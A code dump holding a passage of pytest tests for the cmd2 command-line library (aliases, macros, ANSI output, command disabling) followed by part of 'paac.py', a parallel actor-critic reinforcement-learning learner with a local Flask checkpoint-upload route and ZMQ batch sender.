def test_poutput_empty_string(outsim_app):
msg = ''
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = '\n'
assert out == expected
def test_poutput_none(outsim_app):
msg = None
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = 'None\n'
assert out == expected
def test_poutput_ansi_always(outsim_app):
msg = 'Hello World'
ansi.allow_ansi = ansi.ANSI_ALWAYS
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = colored_msg + '\n'
assert colored_msg != msg
assert out == expected
def test_poutput_ansi_never(outsim_app):
msg = 'Hello World'
ansi.allow_ansi = ansi.ANSI_NEVER
colored_msg = ansi.style(msg, fg='cyan')
outsim_app.poutput(colored_msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert colored_msg != msg
assert out == expected
# These are invalid names for aliases and macros
invalid_command_name = [
'""', # Blank name
constants.COMMENT_CHAR,
'!no_shortcut',
'">"',
'"no>pe"',
'"no spaces"',
'"nopipe|"',
'"noterm;"',
'noembedded"quotes',
]
def test_get_alias_completion_items(base_app):
run_cmd(base_app, 'alias create fake run_pyscript')
run_cmd(base_app, 'alias create ls !ls -hal')
results = base_app._get_alias_completion_items()
assert len(results) == len(base_app.aliases)
for cur_res in results:
assert cur_res in base_app.aliases
assert cur_res.description == base_app.aliases[cur_res]
def test_get_macro_completion_items(base_app):
run_cmd(base_app, 'macro create foo !echo foo')
run_cmd(base_app, 'macro create bar !echo bar')
results = base_app._get_macro_completion_items()
assert len(results) == len(base_app.macros)
for cur_res in results:
assert cur_res in base_app.macros
assert cur_res.description == base_app.macros[cur_res].value
def test_get_settable_completion_items(base_app):
results = base_app._get_settable_completion_items()
for cur_res in results:
assert cur_res in base_app.settable
assert cur_res.description == base_app.settable[cur_res]
def test_alias_no_subcommand(base_app):
out, err = run_cmd(base_app, 'alias')
assert "Usage: alias [-h]" in err[0]
assert "Error: the following arguments are required: subcommand" in err[1]
def test_alias_create(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake run_pyscript')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of aliases
out, err = run_cmd(base_app, 'alias list')
assert out == normalize('alias create fake run_pyscript')
# Look up the new alias
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake run_pyscript')
def test_alias_create_with_quoted_value(base_app):
"""Demonstrate that quotes in alias value will be preserved (except for redirectors and terminators)"""
# Create the alias
out, err = run_cmd(base_app, 'alias create fake help ">" "out file.txt" ";"')
assert out == normalize("Alias 'fake' created")
# Look up the new alias (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'alias list fake')
assert out == normalize('alias create fake help > "out file.txt" ;')
@pytest.mark.parametrize('alias_name', invalid_command_name)
def test_alias_create_invalid_name(base_app, alias_name, capsys):
out, err = run_cmd(base_app, 'alias create {} help'.format(alias_name))
assert "Invalid alias name" in err[0]
def test_alias_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'alias create help stuff')
assert "Alias cannot have the same name as a command" in err[0]
def test_alias_create_with_macro_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'macro create {} help'.format(macro))
out, err = run_cmd(base_app, 'alias create {} help'.format(macro))
assert "Alias cannot have the same name as a macro" in err[0]
def test_alias_that_resolves_into_comment(base_app):
# Create the alias
out, err = run_cmd(base_app, 'alias create fake ' + constants.COMMENT_CHAR + ' blah blah')
assert out == normalize("Alias 'fake' created")
# Use the alias
out, err = run_cmd(base_app, 'fake')
assert not out
assert not err
def test_alias_list_invalid_alias(base_app):
# Look up invalid alias
out, err = run_cmd(base_app, 'alias list invalid')
assert "Alias 'invalid' not found" in err[0]
def test_alias_delete(base_app):
# Create an alias
run_cmd(base_app, 'alias create fake run_pyscript')
# Delete the alias
out, err = run_cmd(base_app, 'alias delete fake')
assert out == normalize("Alias 'fake' deleted")
def test_alias_delete_all(base_app):
out, err = run_cmd(base_app, 'alias delete --all')
assert out == normalize("All aliases deleted")
def test_alias_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'alias delete fake')
assert "Alias 'fake' does not exist" in err[0]
def test_alias_delete_no_name(base_app):
out, err = run_cmd(base_app, 'alias delete')
assert "Either --all or alias name(s)" in err[0]
def test_multiple_aliases(base_app):
alias1 = 'h1'
alias2 = 'h2'
run_cmd(base_app, 'alias create {} help'.format(alias1))
run_cmd(base_app, 'alias create {} help -v'.format(alias2))
out, err = run_cmd(base_app, alias1)
verify_help_text(base_app, out)
out, err = run_cmd(base_app, alias2)
verify_help_text(base_app, out)
def test_macro_no_subcommand(base_app):
out, err = run_cmd(base_app, 'macro')
assert "Usage: macro [-h]" in err[0]
assert "Error: the following arguments are required: subcommand" in err[1]
def test_macro_create(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake run_pyscript')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake')
assert "the following arguments are required: script_path" in err[1]
# See a list of macros
out, err = run_cmd(base_app, 'macro list')
assert out == normalize('macro create fake run_pyscript')
# Look up the new macro
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake run_pyscript')
def test_macro_create_with_quoted_value(base_app):
"""Demonstrate that quotes in macro value will be preserved (except for redirectors and terminators)"""
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help ">" "out file.txt" ";"')
assert out == normalize("Macro 'fake' created")
# Look up the new macro (Only the redirector should be unquoted)
out, err = run_cmd(base_app, 'macro list fake')
assert out == normalize('macro create fake help > "out file.txt" ;')
@pytest.mark.parametrize('macro_name', invalid_command_name)
def test_macro_create_invalid_name(base_app, macro_name):
out, err = run_cmd(base_app, 'macro create {} help'.format(macro_name))
assert "Invalid macro name" in err[0]
def test_macro_create_with_command_name(base_app):
out, err = run_cmd(base_app, 'macro create help stuff')
assert "Macro cannot have the same name as a command" in err[0]
def test_macro_create_with_alias_name(base_app):
macro = "my_macro"
run_cmd(base_app, 'alias create {} help'.format(macro))
out, err = run_cmd(base_app, 'macro create {} help'.format(macro))
assert "Macro cannot have the same name as an alias" in err[0]
def test_macro_create_with_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake help -v')
verify_help_text(base_app, out)
def test_macro_create_with_escaped_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {{1}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert err[0].startswith('No help on {1}')
def test_macro_usage_with_missing_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {2}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake arg1')
assert "expects at least 2 argument(s)" in err[0]
def test_macro_usage_with_extra_args(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake alias create')
assert "Usage: alias create" in out[0]
def test_macro_create_with_missing_arg_nums(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {3}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_create_with_invalid_arg_num(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake help {1} {-1} {0}')
assert "Argument numbers must be greater than 0" in err[0]
def test_macro_create_with_unicode_numbered_arg(base_app):
# Create the macro expecting 1 argument
out, err = run_cmd(base_app, 'macro create fake help {\N{ARABIC-INDIC DIGIT ONE}}')
assert out == normalize("Macro 'fake' created")
# Run the macro
out, err = run_cmd(base_app, 'fake')
assert "expects at least 1 argument(s)" in err[0]
def test_macro_create_with_missing_unicode_arg_nums(base_app):
out, err = run_cmd(base_app, 'macro create fake help {1} {\N{ARABIC-INDIC DIGIT THREE}}')
assert "Not all numbers between 1 and 3" in err[0]
def test_macro_that_resolves_into_comment(base_app):
# Create the macro
out, err = run_cmd(base_app, 'macro create fake {1} blah blah')
assert out == normalize("Macro 'fake' created")
# Use the macro
out, err = run_cmd(base_app, 'fake ' + constants.COMMENT_CHAR)
assert not out
assert not err
def test_macro_list_invalid_macro(base_app):
# Look up invalid macro
out, err = run_cmd(base_app, 'macro list invalid')
assert "Macro 'invalid' not found" in err[0]
def test_macro_delete(base_app):
# Create a macro
run_cmd(base_app, 'macro create fake run_pyscript')
# Delete the macro
out, err = run_cmd(base_app, 'macro delete fake')
assert out == normalize("Macro 'fake' deleted")
def test_macro_delete_all(base_app):
out, err = run_cmd(base_app, 'macro delete --all')
assert out == normalize("All macros deleted")
def test_macro_delete_non_existing(base_app):
out, err = run_cmd(base_app, 'macro delete fake')
assert "Macro 'fake' does not exist" in err[0]
def test_macro_delete_no_name(base_app):
out, err = run_cmd(base_app, 'macro delete')
assert "Either --all or macro name(s)" in err[0]
def test_multiple_macros(base_app):
macro1 = 'h1'
macro2 = 'h2'
run_cmd(base_app, 'macro create {} help'.format(macro1))
run_cmd(base_app, 'macro create {} help -v'.format(macro2))
out, err = run_cmd(base_app, macro1)
verify_help_text(base_app, out)
out2, err2 = run_cmd(base_app, macro2)
verify_help_text(base_app, out2)
assert len(out2) > len(out)
def test_nonexistent_macro(base_app):
from cmd2.parsing import StatementParser
exception = None
try:
base_app._resolve_macro(StatementParser().parse('fake'))
except KeyError as e:
exception = e
assert exception is not None
def test_perror_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.perror(msg)
out, err = capsys.readouterr()
assert err == ansi.style_error(msg) + end
def test_perror_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.perror(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_pwarning_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.pwarning(msg)
out, err = capsys.readouterr()
assert err == ansi.style_warning(msg) + end
def test_pwarning_no_style(base_app, capsys):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
base_app.pwarning(msg, apply_style=False)
out, err = capsys.readouterr()
assert err == msg + end
def test_ppaged(outsim_app):
msg = 'testing...'
end = '\n'
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_blank(outsim_app):
msg = ''
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_none(outsim_app):
msg = None
outsim_app.ppaged(msg)
out = outsim_app.stdout.getvalue()
assert not out
def test_ppaged_strips_ansi_when_redirecting(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_TERMINAL
outsim_app._redirecting = True
outsim_app.ppaged(ansi.style(msg, fg='red'))
out = outsim_app.stdout.getvalue()
assert out == msg + end
def test_ppaged_strips_ansi_when_redirecting_if_always(outsim_app):
msg = 'testing...'
end = '\n'
ansi.allow_ansi = ansi.ANSI_ALWAYS
outsim_app._redirecting = True
colored_msg = ansi.style(msg, fg='red')
outsim_app.ppaged(colored_msg)
out = outsim_app.stdout.getvalue()
assert out == colored_msg + end
# We override cmd.parseline() so that the parent-class methods we don't
# override always get consistent command parsing. We don't need to retest
# all of the parsing logic here, because
# parseline just calls StatementParser.parse_command_only()
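# Added illustrative note (not from the original tests): with this override,
# a call such as base_app.parseline("  help history  ") is expected to return
# ('help', 'history', 'help history'); the two tests below exercise the empty
# and partially quoted cases.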
def test_parseline_empty(base_app):
statement = ''
command, args, line = base_app.parseline(statement)
assert not command
assert not args
assert not line
def test_parseline(base_app):
statement = " command with 'partially completed quotes "
command, args, line = base_app.parseline(statement)
assert command == 'command'
assert args == "with 'partially completed quotes"
assert line == statement.strip()
def test_onecmd_raw_str_continue(outsim_app):
line = "help"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert not stop
verify_help_text(outsim_app, out)
def test_onecmd_raw_str_quit(outsim_app):
line = "quit"
stop = outsim_app.onecmd(line)
out = outsim_app.stdout.getvalue()
assert stop
assert out == ''
def test_onecmd_add_to_history(outsim_app):
line = "help"
saved_hist_len = len(outsim_app.history)
# Allow command to be added to history
outsim_app.onecmd(line, add_to_history=True)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len + 1
saved_hist_len = new_hist_len
# Prevent command from being added to history
outsim_app.onecmd(line, add_to_history=False)
new_hist_len = len(outsim_app.history)
assert new_hist_len == saved_hist_len
def test_get_all_commands(base_app):
# Verify that the base app has the expected commands
commands = base_app.get_all_commands()
expected_commands = ['_relative_run_script', 'alias', 'edit', 'eof', 'help', 'history', 'macro',
'py', 'quit', 'run_pyscript', 'run_script', 'set', 'shell', 'shortcuts']
assert commands == expected_commands
def test_get_help_topics(base_app):
# Verify that the base app has no additional help_foo methods
custom_help = base_app.get_help_topics()
assert len(custom_help) == 0
def test_get_help_topics_hidden():
# Verify get_help_topics() filters out hidden commands
class TestApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_my_cmd(self, args):
pass
def help_my_cmd(self, args):
pass
app = TestApp()
assert 'my_cmd' in app.get_help_topics()
app.hidden_commands.append('my_cmd')
assert 'my_cmd' not in app.get_help_topics()
class ReplWithExitCode(cmd2.Cmd):
"""Example cmd2 application where we can specify an exit code when exiting."""
def __init__(self):
super().__init__(allow_cli_args=False)
@cmd2.with_argument_list
def do_exit(self, arg_list) -> bool:
"""Exit the application with an optional exit code.
Usage: exit [exit_code]
Where:
* exit_code - integer exit code to return to the shell
"""
# If an argument was provided
if arg_list:
try:
self.exit_code = int(arg_list[0])
except ValueError:
self.perror("{} isn't a valid integer exit code".format(arg_list[0]))
self.exit_code = -1
# Return True to stop the command loop
return True
def postloop(self) -> None:
"""Hook method executed once when the cmdloop() method is about to return."""
self.poutput('exiting with code: {}'.format(self.exit_code))
@pytest.fixture
def exit_code_repl():
app = ReplWithExitCode()
app.stdout = utils.StdSim(app.stdout)
return app
def test_exit_code_default(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit')
builtins.input = m
expected = 'exiting with code: 0\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_exit_code_nonzero(exit_code_repl):
app = exit_code_repl
app.use_rawinput = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='exit 23')
builtins.input = m
expected = 'exiting with code: 23\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
class AnsiApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_echo(self, args):
self.poutput(args)
self.perror(args)
def do_echo_error(self, args):
self.poutput(ansi.style(args, fg='red'))
# perror uses colors by default
self.perror(args)
def test_ansi_pouterr_always_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some escape sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_pouterr_always_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_ALWAYS
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
# if colors are on, the output should have some escape sequences in it
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
# errors always have colors
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
# if colors are on, the output should have some escape sequences in it
out, err = capsys.readouterr()
assert len(out) > len('oopsie\n')
assert 'oopsie' in out
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
# but this one shouldn't
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == 'oopsie\n'
assert len(err) > len('oopsie\n')
assert 'oopsie' in err
def test_ansi_terminal_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_TERMINAL
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_tty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=True)
mocker.patch.object(sys.stderr, 'isatty', return_value=True)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
def test_ansi_never_notty(mocker, capsys):
app = AnsiApp()
ansi.allow_ansi = ansi.ANSI_NEVER
mocker.patch.object(app.stdout, 'isatty', return_value=False)
mocker.patch.object(sys.stderr, 'isatty', return_value=False)
app.onecmd_plus_hooks('echo_error oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
app.onecmd_plus_hooks('echo oopsie')
out, err = capsys.readouterr()
assert out == err == 'oopsie\n'
class DisableCommandsApp(cmd2.Cmd):
"""Class for disabling commands"""
category_name = "Test Category"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category(category_name)
def do_has_helper_funcs(self, arg):
self.poutput("The real has_helper_funcs")
def help_has_helper_funcs(self):
self.poutput('Help for has_helper_funcs')
def complete_has_helper_funcs(self, *args):
return ['result']
@cmd2.with_category(category_name)
def do_has_no_helper_funcs(self, arg):
"""Help for has_no_helper_funcs"""
self.poutput("The real has_no_helper_funcs")
@pytest.fixture
def disable_commands_app():
app = DisableCommandsApp()
return app
def test_disable_and_enable_category(disable_commands_app):
##########################################################################
# Disable the category
##########################################################################
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_category(disable_commands_app.category_name, message_to_print)
# Make sure all the commands and help on those commands displays the message
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert err[0].startswith(message_to_print)
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert err[0].startswith(message_to_print)
# Make sure neither function completes
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are invisible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' not in visible_commands
assert 'has_no_helper_funcs' not in visible_commands
# Make sure get_help_topics() filters out disabled commands
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' not in help_topics
##########################################################################
# Enable the category
##########################################################################
disable_commands_app.enable_category(disable_commands_app.category_name)
# Make sure all the commands and help on those commands are restored
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert out[0] == "The real has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_helper_funcs')
assert out[0] == "Help for has_helper_funcs"
out, err = run_cmd(disable_commands_app, 'has_no_helper_funcs')
assert out[0] == "The real has_no_helper_funcs"
out, err = run_cmd(disable_commands_app, 'help has_no_helper_funcs')
assert out[0] == "Help for has_no_helper_funcs"
# has_helper_funcs should complete now
text = ''
line = 'has_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is not None and disable_commands_app.completion_matches == ['result ']
# has_no_helper_funcs had no completer originally, so there should be no results
text = ''
line = 'has_no_helper_funcs'
endidx = len(line)
begidx = endidx - len(text)
first_match = complete_tester(text, line, begidx, endidx, disable_commands_app)
assert first_match is None
# Make sure both commands are visible
visible_commands = disable_commands_app.get_visible_commands()
assert 'has_helper_funcs' in visible_commands
assert 'has_no_helper_funcs' in visible_commands
# Make sure get_help_topics() contains our help function
help_topics = disable_commands_app.get_help_topics()
assert 'has_helper_funcs' in help_topics
def test_enable_enabled_command(disable_commands_app):
# Test enabling a command that is not disabled
saved_len = len(disable_commands_app.disabled_commands)
disable_commands_app.enable_command('has_helper_funcs')
# The number of disabled_commands should not have changed
assert saved_len == len(disable_commands_app.disabled_commands)
def test_disable_fake_command(disable_commands_app):
with pytest.raises(AttributeError):
disable_commands_app.disable_command('fake', 'fake message')
def test_disable_command_twice(disable_commands_app):
saved_len = len(disable_commands_app.disabled_commands)
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
# The length of disabled_commands should have increased one
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len - 1
saved_len = new_len
# Disable again and the length should not change
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
new_len = len(disable_commands_app.disabled_commands)
assert saved_len == new_len
def test_disabled_command_not_in_history(disable_commands_app):
message_to_print = 'These commands are currently disabled'
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
saved_len = len(disable_commands_app.history)
run_cmd(disable_commands_app, 'has_helper_funcs')
assert saved_len == len(disable_commands_app.history)
def test_disabled_message_command_name(disable_commands_app):
message_to_print = '{} is currently disabled'.format(COMMAND_NAME)
disable_commands_app.disable_command('has_helper_funcs', message_to_print)
out, err = run_cmd(disable_commands_app, 'has_helper_funcs')
assert err[0].startswith('has_helper_funcs is currently disabled')
def test_startup_script(request):
test_dir = os.path.dirname(request.module.__file__)
startup_script = os.path.join(test_dir, '.cmd2rc')
app = cmd2.Cmd(allow_cli_args=False, startup_script=startup_script)
assert len(app._startup_commands) == 1
assert app._startup_commands[0] == "run_script '{}'".format(startup_script)
app._startup_commands.append('quit')
app.cmdloop()
out, err = run_cmd(app, 'alias list')
assert len(out) > 1
assert 'alias create ls' in out[0]
def test_transcripts_at_init():
transcript_files = ['foo', 'bar']
app = cmd2.Cmd(allow_cli_args=False, transcript_files=transcript_files)
assert app._transcript_files == transcript_files
|
paac.py
|
import os, time, logging, zmq, re
from flask import Flask, request
from multiprocessing.sharedctypes import RawArray
from ctypes import c_uint, c_float
from actor_learner import *
from emulator_runner import EmulatorRunner
from runners import Runners
from zmq_serialize import SerializingContext
from multiprocessing import Process, Queue
flask_file_server = Flask(__name__)
@flask_file_server.route('/d3rl/network', methods=['POST'])
def upload_network():
network_ckpt = request.files.getlist('files')
file_num, ckpt_num = 0, ""
for f in network_ckpt:
f.save("/root/D3RL_ZMQ_Vtrace/logs/upload/" + f.filename)
file_num += 1
if ckpt_num == "":
ckpt_num = f.filename.split(".")[0]
with open("/root/D3RL_ZMQ_Vtrace/logs/upload/checkpoint", "w") as f:
f.writelines(["model_checkpoint_path: \"" + ckpt_num + "\"\n",
"all_model_checkpoint_paths: \"" + ckpt_num + "\""])
return '{"code":"ok","file_num":%d}' % file_num
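# Hedged illustration (not part of the original training code): a minimal sketch
# of how the GPU-learner side might push a TensorFlow checkpoint to the Flask
# endpoint above. The `requests` dependency, the host/port, and the checkpoint
# suffixes are assumptions made only for this example.
def _example_upload_checkpoint(ckpt_prefix, host='127.0.0.1', port=6668):
    import requests  # assumed dependency, used only by this sketch
    suffixes = ('.index', '.meta', '.data-00000-of-00001')
    files = [('files', open(ckpt_prefix + suffix, 'rb')) for suffix in suffixes]
    try:
        # The Flask route above saves every uploaded file and rewrites the
        # `checkpoint` index so tf.train.latest_checkpoint() can find it.
        resp = requests.post('http://{}:{}/d3rl/network'.format(host, port), files=files)
        return resp.text
    finally:
        for _, handle in files:
            handle.close()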
def send_zmq_batch_data(queue):
ctx = SerializingContext()
req = ctx.socket(zmq.REQ)
req.connect("tcp://127.0.0.1:6666")
while True:
data = queue.get()
req.send_zipped_pickle(data)
msg = req.recv_string()
if msg == "stop":
break
req.close()
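# Hedged sketch (not part of the original file): the matching REP end of the
# socket above, assuming zmq_serialize mirrors the pyzmq serialization example
# and exposes recv_zipped_pickle()/send_string(). handle_batch is a placeholder
# callback that returns False when the receiver wants the sender to stop.
def _example_receive_batches(handle_batch):
    ctx = SerializingContext()
    rep = ctx.socket(zmq.REP)
    rep.bind("tcp://127.0.0.1:6666")
    while True:
        # batch is [states, rewards, episodes_over_masks, actions, values]
        batch = rep.recv_zipped_pickle()
        keep_going = handle_batch(batch)
        rep.send_string("ok" if keep_going else "stop")
        if not keep_going:
            break
    rep.close()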
class PAACLearner(ActorLearner):
def __init__(self, network_creator, environment_creator, args):
super(PAACLearner, self).__init__(network_creator, environment_creator, args)
self.workers = args.emulator_workers
self.latest_ckpt = "-0"
self.send_batch_queue = Queue()
self.flask_file_server_proc = Process(target=flask_file_server.run,
kwargs={'host': '127.0.0.1', 'port': 6668})
self.send_zmq_batch_data_proc = Process(target=send_zmq_batch_data, kwargs={'queue': self.send_batch_queue})
@staticmethod
def choose_next_actions(network, num_actions, states, session):
network_output_v, network_output_pi = session.run(
[network.output_layer_v,
network.output_layer_pi],
feed_dict={network.input_ph: states})
action_indices = PAACLearner.__sample_policy_action(network_output_pi)
new_actions = np.eye(num_actions)[action_indices]
return new_actions, network_output_v, network_output_pi
def __choose_next_actions(self, states):
return PAACLearner.choose_next_actions(self.network, self.num_actions, states, self.session)
@staticmethod
def __sample_policy_action(probs):
"""
Sample an action from an action probability distribution output by
the policy network.
"""
# Subtract a tiny value from probabilities in order to avoid
# "ValueError: sum(pvals[:-1]) > 1.0" in numpy.multinomial
probs = probs - np.finfo(np.float32).epsneg
action_indexes = [int(np.nonzero(np.random.multinomial(1, p))[0]) for p in probs]
return action_indexes
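# Added explanatory comment: for a probability row such as [0.2, 0.5, 0.3],
# np.random.multinomial(1, p) draws a one-hot sample like [0, 1, 0] and
# np.nonzero() recovers the index of that 1, so one action index is sampled
# per emulator from its own policy distribution.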
def _get_shared(self, array, dtype=c_float):
"""
Returns a RawArray backed numpy array that can be shared between processes.
:param array: the array to be shared
:param dtype: the RawArray dtype to use
:return: the RawArray backed numpy array
"""
shape = array.shape
shared = RawArray(dtype, array.reshape(-1))
return np.frombuffer(shared, dtype).reshape(shape)
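# Added explanatory comment: RawArray allocates the buffer in shared memory and
# np.frombuffer() wraps that buffer without copying, so the EmulatorRunner
# worker processes and this process operate on the same states/rewards/actions
# arrays rather than on per-process copies.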
def train(self):
"""
Main actor learner loop for parallel advantage actor critic learning.
"""
self.flask_file_server_proc.start()
self.send_zmq_batch_data_proc.start()
self.global_step = self.init_network()
logging.debug("Starting training at Step {}".format(self.global_step))
counter = 0
global_step_start = self.global_step
total_rewards = []
# state, reward, episode_over, action
variables = [(np.asarray([emulator.get_initial_state() for emulator in self.emulators], dtype=np.uint8)),
(np.zeros(self.emulator_counts, dtype=np.float32)),
(np.asarray([False] * self.emulator_counts, dtype=np.float32)),
(np.zeros((self.emulator_counts, self.num_actions), dtype=np.float32))]
self.runners = Runners(EmulatorRunner, self.emulators, self.workers, variables)
self.runners.start()
shared_states, shared_rewards, shared_episode_over, shared_actions = self.runners.get_shared_variables()
summaries_op = tf.summary.merge_all()
emulator_steps = [0] * self.emulator_counts
total_episode_rewards = self.emulator_counts * [0]
actions_sum = np.zeros((self.emulator_counts, self.num_actions))
y_batch = np.zeros((self.max_local_steps, self.emulator_counts))
adv_batch = np.zeros((self.max_local_steps, self.emulator_counts))
rewards = np.zeros((self.max_local_steps, self.emulator_counts))
states = np.zeros([self.max_local_steps + 1] + list(shared_states.shape), dtype=np.uint8)
actions = np.zeros((self.max_local_steps, self.emulator_counts, self.num_actions))
values = np.zeros((self.max_local_steps, self.emulator_counts))
episodes_over_masks = np.zeros((self.max_local_steps, self.emulator_counts))
start_time = time.time()
while self.global_step < self.max_global_steps:
loop_start_time = time.time()
max_local_steps = self.max_local_steps
for t in range(max_local_steps):
next_actions, readouts_v_t, readouts_pi_t = self.__choose_next_actions(shared_states)
actions_sum += next_actions
for z in range(next_actions.shape[0]):
shared_actions[z] = next_actions[z]
actions[t] = next_actions
values[t] = readouts_v_t
states[t] = shared_states
# Start updating all environments with next_actions
self.runners.update_environments()
self.runners.wait_updated()
# Done updating all environments, have new states, rewards and is_over
episodes_over_masks[t] = 1.0 - shared_episode_over.astype(np.float32)
for e, (actual_reward, episode_over) in enumerate(zip(shared_rewards, shared_episode_over)):
total_episode_rewards[e] += actual_reward
actual_reward = self.rescale_reward(actual_reward)
rewards[t, e] = actual_reward
emulator_steps[e] += 1
self.global_step += 1
if episode_over:
total_rewards.append(total_episode_rewards[e])
